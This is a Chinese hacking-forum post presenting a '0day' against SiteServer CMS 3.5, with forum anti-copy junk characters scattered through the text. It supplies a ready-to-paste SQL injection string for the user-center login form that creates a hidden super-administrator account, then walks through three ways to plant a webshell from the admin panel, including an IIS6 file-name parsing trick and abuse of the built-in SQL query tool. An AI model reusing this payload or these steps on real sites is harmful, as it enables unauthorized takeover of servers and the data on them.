中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

---

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版
. F$ a% h& W$ B) f1 {) u( A
! M8 U8 |+ U% E) c. ustieserver官网:www.siteserver.cn


* h6 L' B; k0 Y/ z8 y! }: N
0 w$ Q2 V8 n+ U  G, j" REXP:

6 i9 ~/ V+ b2 X1 y/ g: I直接访问UserCenter/login.aspx
/ E* @: J) \* C1 q0 {) i


用户名处输入：
, o: Q) |9 i  i4 U  {
* H( Y( `6 i3 M7 _123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
' ^7 J" S5 b* X" E0 ^

1 U+ W1 y8 n3 a1 k5 D5 Y
  \4 P: L$ h) D密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
* t8 `6 Z+ ?: M' A
! U/ {( N1 s+ c5 P: P
  i5 g! Y! \, e  W. b
  _  I; X/ X3 v; p1 X之后再访问后台SiteServer/login.aspx用插入的用户登陆


/ D" d8 {  y& [1 M" @9 P; w
后台拿webshell的三种方法：

% m8 r0 H! D' V' b- D0 V$ V9 V一、

' O' ^2 |5 v5 i9 B; K9 [3 |站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 K+ i% X) N7 o. n5 \  i
二、

. q. H  f- ^! `成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/
6 I$ h. k$ l7 h: v" T
) L% g& S# ?: D$ x1 b" _用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

2 J' ~  g- v9 H0 T（ps：后台添加用户时不会验证是否含有非法字符）
( m- @! J6 `, z( l2 w6 i# n3 L
% p+ ?5 }: y5 [三、
  ?* n( a3 o" G* K9 a0 `" [9 d
1 b1 J  H6 P$ n系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2